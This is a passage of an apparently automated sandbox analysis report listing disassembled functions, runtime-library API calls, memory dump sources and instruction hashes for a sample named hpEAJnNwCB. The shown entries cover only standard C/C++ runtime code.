                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 024B3159
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AssignBase::ChoreConcurrency::details::Concurrency::location::_EntryException@8InterlockedListQueueRealizedSafeSchedulerThrowstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3496964030-0
                                                                                                                                                                                                                                            • Opcode ID: 0093e90f9f9b4a807c17d0b905e901c0316188718c0b65bdcccfb738fdf3468d
                                                                                                                                                                                                                                            • Instruction ID: f5d5fef6b53f7c64d78a1fa4a44ada6187afeb9d7ca8ddd8923b2a1d6ba132a7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0093e90f9f9b4a807c17d0b905e901c0316188718c0b65bdcccfb738fdf3468d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7031DF31A006119FCB26EF6AC854AAABBB5FF54710F10459EDC0A8B255DB70E945CFE0
                                                                                                                                                                                                                                            Function 024B8F24 Relevance: 9.1, APIs: 6, Instructions: 87COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindSITargetTypeInstance.LIBVCRUNTIME ref: 024B8F77
                                                                                                                                                                                                                                            • FindMITargetTypeInstance.LIBVCRUNTIME ref: 024B8F90
                                                                                                                                                                                                                                            • FindVITargetTypeInstance.LIBVCRUNTIME ref: 024B8F97
                                                                                                                                                                                                                                            • PMDtoOffset.LIBCMT ref: 024B8FB6
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FindInstanceTargetType$Offset
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1467055271-0
                                                                                                                                                                                                                                            • Opcode ID: 6fe96d91ed349e682c0e64a172f602ef2dce5d8881000acf6ba3df64c6c4f2c7
                                                                                                                                                                                                                                            • Instruction ID: 303c10ebec035a4d168a297348005e896b450e5952acf442b57b24ff5071a0ae
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6fe96d91ed349e682c0e64a172f602ef2dce5d8881000acf6ba3df64c6c4f2c7
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CF2127726042049FCF16DF69D849AEE77AEEF44754B24822FE90293280D731E901CEB0
                                                                                                                                                                                                                                            Function 02495437 Relevance: 9.1, APIs: 6, Instructions: 82COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1687354797-0
                                                                                                                                                                                                                                            • Opcode ID: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
                                                                                                                                                                                                                                            • Instruction ID: d7bb6c09bf257bc3ed6a3e8ff8326dba060557a98909897fac6c20379aa61f84
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9D217E72C04209AADF16EBA9D844BDEBFB9AF09325F24401FE104B6240DB749A448E65
                                                                                                                                                                                                                                            Function 024B9041 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,024B9038,024B69C9,024D0907,00000008,024D0C6C,?,?,?,?,024B3CB2,?,?,0045A064), ref: 024B904F
                                                                                                                                                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 024B905D
                                                                                                                                                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 024B9076
                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,024B9038,024B69C9,024D0907,00000008,024D0C6C,?,?,?,?,024B3CB2,?,?,0045A064), ref: 024B90C8
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3852720340-0
                                                                                                                                                                                                                                            • Opcode ID: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                                                                                                                                                                                                            • Instruction ID: 52334fe92522e38c59e5aa06fb3791982173b72628c52414da0830fe3f1b5e94
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B601F7326097216EA72B27B5AC88AE72755EF05775B30033FFA20453E1EF1288554DB9
                                                                                                                                                                                                                                            Function 00428DDA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,00428DD1,00426762,004406A0,00000008,00440A05,?,?,?,?,00423A4B,?,?,B4B77C26), ref: 00428DE8
                                                                                                                                                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00428DF6
                                                                                                                                                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00428E0F
                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,00428DD1,00426762,004406A0,00000008,00440A05,?,?,?,?,00423A4B,?,?,B4B77C26), ref: 00428E61
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3852720340-0
                                                                                                                                                                                                                                            • Opcode ID: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                                                                                                                                                                                                            • Instruction ID: 8d354f8c373550ad8ca54886775f1e1f72959a5719103f68ef850459183cda9d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5801283630A7316EA7242BF57C8956F2744EB0677ABA0033FF414913E2EF194C21950D
                                                                                                                                                                                                                                            Function 02494FB9 Relevance: 9.1, APIs: 6, Instructions: 53COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 02494FCA
                                                                                                                                                                                                                                            • int.LIBCPMT ref: 02494FE1
                                                                                                                                                                                                                                              • Part of subcall function 0249BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0249BFD4
                                                                                                                                                                                                                                              • Part of subcall function 0249BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0249BFEE
                                                                                                                                                                                                                                            • std::locale::_Getfacet.LIBCPMT ref: 02494FEA
                                                                                                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 0249501B
                                                                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 02495031
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0249504F
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2243866535-0
                                                                                                                                                                                                                                            • Opcode ID: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                                                                                                                                                                                                            • Instruction ID: fa33ef56bb0c95eeb39764d851304065e66f7ef03ad4c32615aad209ff46229a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D211AC319002289BCF26EBA5D800BAE7FB6BF04314F64011FE416AB290DB749A068FD0
                                                                                                                                                                                                                                            Function 00404D52 Relevance: 9.1, APIs: 6, Instructions: 53COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00404D63
                                                                                                                                                                                                                                            • int.LIBCPMT ref: 00404D7A
                                                                                                                                                                                                                                              • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                                                                                                                                                                                              • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                                                                                                                                                                                                            • std::locale::_Getfacet.LIBCPMT ref: 00404D83
                                                                                                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 00404DB4
                                                                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00404DCA
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00404DE8
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2243866535-0
                                                                                                                                                                                                                                            • Opcode ID: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                                                                                                                                                                                                            • Instruction ID: 50d9ff0d4b57cf36d5715a51c78873cd43da78958b4b2dc720108d245924cf68
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EB11A0B2D101299BCB15EBA4C841AAE77B0AF44318F14457FE911BB2D2DB3C9A058BDD
                                                                                                                                                                                                                                            Function 0249C3F0 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0249C401
                                                                                                                                                                                                                                            • int.LIBCPMT ref: 0249C418
                                                                                                                                                                                                                                              • Part of subcall function 0249BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0249BFD4
                                                                                                                                                                                                                                              • Part of subcall function 0249BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0249BFEE
                                                                                                                                                                                                                                            • std::locale::_Getfacet.LIBCPMT ref: 0249C421
                                                                                                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 0249C452
                                                                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0249C468
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0249C486
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2243866535-0
                                                                                                                                                                                                                                            • Opcode ID: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                                                                                                                                                                                                            • Instruction ID: 768ddee3b84e9ddeaa3bf83ec9fb509deffc589887249256fa741be070419ae9
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5311E1719002289BCF15FBA5D884AEE7F76AF49714F10011FE411BB290DF748A05CFA0
                                                                                                                                                                                                                                            Function 02494E7B Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 02494E8C
                                                                                                                                                                                                                                            • int.LIBCPMT ref: 02494EA3
                                                                                                                                                                                                                                              • Part of subcall function 0249BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0249BFD4
                                                                                                                                                                                                                                              • Part of subcall function 0249BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0249BFEE
                                                                                                                                                                                                                                            • std::locale::_Getfacet.LIBCPMT ref: 02494EAC
                                                                                                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 02494EDD
                                                                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 02494EF3
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 02494F11
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2243866535-0
                                                                                                                                                                                                                                            • Opcode ID: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                                                                                                                                                                                                            • Instruction ID: d47f19abc1e49232ed04b5a5dcb823522a3c093a12b881c46147ccb0ac8bd282
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2411CE32D002299BCF15EBA5E800BEE7F76AF44314F24011FE411A7290DB749E06CF90
                                                                                                                                                                                                                                            Function 0040C189 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0040C19A
                                                                                                                                                                                                                                            • int.LIBCPMT ref: 0040C1B1
                                                                                                                                                                                                                                              • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                                                                                                                                                                                              • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                                                                                                                                                                                                            • std::locale::_Getfacet.LIBCPMT ref: 0040C1BA
                                                                                                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 0040C1EB
                                                                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0040C201
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C21F
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2243866535-0
                                                                                                                                                                                                                                            • Opcode ID: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                                                                                                                                                                                                            • Instruction ID: ee53003dfc9470fa79d8cc5ab50186f75a1860792542933f5f9c6443a3e70220
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B2119172900219EBCB15EB90C881AAD7760AF44314F14053FE811BB2D2DB389A059B99
                                                                                                                                                                                                                                            Function 004054D2 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 004054E3
                                                                                                                                                                                                                                            • int.LIBCPMT ref: 004054FA
                                                                                                                                                                                                                                              • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                                                                                                                                                                                              • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                                                                                                                                                                                                            • std::locale::_Getfacet.LIBCPMT ref: 00405503
                                                                                                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 00405534
                                                                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0040554A
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00405568
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2243866535-0
                                                                                                                                                                                                                                            • Opcode ID: 10913962cff3651302842d72b7cb42c766a1b7b0878e2d3a054d6c0589329772
                                                                                                                                                                                                                                            • Instruction ID: 21a092b80c120d3a1799ad65edf81cfe58c90a4d0a542ae4cd53e0a409a0227e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 10913962cff3651302842d72b7cb42c766a1b7b0878e2d3a054d6c0589329772
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A711AC72D10628ABCB15EBA4C801AAE7774EF44318F14053EE811BB2D2DB389A058F9C
                                                                                                                                                                                                                                            Function 0040556E Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0040557F
                                                                                                                                                                                                                                            • int.LIBCPMT ref: 00405596
                                                                                                                                                                                                                                              • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                                                                                                                                                                                              • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                                                                                                                                                                                                            • std::locale::_Getfacet.LIBCPMT ref: 0040559F
                                                                                                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004055D0
                                                                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004055E6
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00405604
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2243866535-0
                                                                                                                                                                                                                                            • Opcode ID: f8330ae3b68186870bdfbd2c21a05cb33b5aede15e19bdae88c6f234de43f936
                                                                                                                                                                                                                                            • Instruction ID: 21547056dedd0a357f918a94d9d64b27cd1eadba8e4608574907870a271d474c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f8330ae3b68186870bdfbd2c21a05cb33b5aede15e19bdae88c6f234de43f936
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3D119E72900628EBCB15EBA5C841AEEB370EF04314F14453FE811BB2D2DB789A058B9C
                                                                                                                                                                                                                                            Function 00404C14 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00404C25
                                                                                                                                                                                                                                            • int.LIBCPMT ref: 00404C3C
                                                                                                                                                                                                                                              • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                                                                                                                                                                                              • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                                                                                                                                                                                                            • std::locale::_Getfacet.LIBCPMT ref: 00404C45
                                                                                                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 00404C76
                                                                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00404C8C
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00404CAA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2243866535-0
                                                                                                                                                                                                                                            • Opcode ID: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                                                                                                                                                                                                            • Instruction ID: 1aa241efc112286da59c73bb00310cdec327cb4216d8ea75c5d160ea2c1741d7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5311E0B2C002289BCB11EBA0C801AEE7774AF44318F10053FE911BB2D1CB389E058B98
                                                                                                                                                                                                                                            Function 00404E63 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 00404E6A
                                                                                                                                                                                                                                              • Part of subcall function 0040BB47: __EH_prolog3_GS.LIBCMT ref: 0040BB4E
                                                                                                                                                                                                                                            • std::_Locinfo::_Locinfo.LIBCPMT ref: 00404EB5
                                                                                                                                                                                                                                            • __Getcoll.LIBCPMT ref: 00404EC4
                                                                                                                                                                                                                                            • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404ED4
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                                                                                                                                                            • String ID: fJ@
                                                                                                                                                                                                                                            • API String ID: 1836011271-3478227103
                                                                                                                                                                                                                                            • Opcode ID: c526677c734dc493626db39d482cf98f5f5362d0ee08f882613185e0243459e5
                                                                                                                                                                                                                                            • Instruction ID: b09a35a98a06b47a9133a0f6fd6c3c5fe655fd81b24a3011873ef7005f6a19eb
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c526677c734dc493626db39d482cf98f5f5362d0ee08f882613185e0243459e5
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 160157719002089FDB00EFA5C481B9EB7B0BF80318F10857EE045AB6C1CB789A84CB99
                                                                                                                                                                                                                                            Function 0042FEE4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0042FE95,00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002), ref: 0042FF04
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0042FF17
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,0042FE95,00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000), ref: 0042FF3A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                            • Opcode ID: a7c01f4cf2846fc1278f2b92eb4297b36712501a434ecdb6ef0bfa768b076a5b
                                                                                                                                                                                                                                            • Instruction ID: 2c645cf7ccd09daad3cc37133732e5cb7e12e7ad02a2fd82027b287817b89b2c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a7c01f4cf2846fc1278f2b92eb4297b36712501a434ecdb6ef0bfa768b076a5b
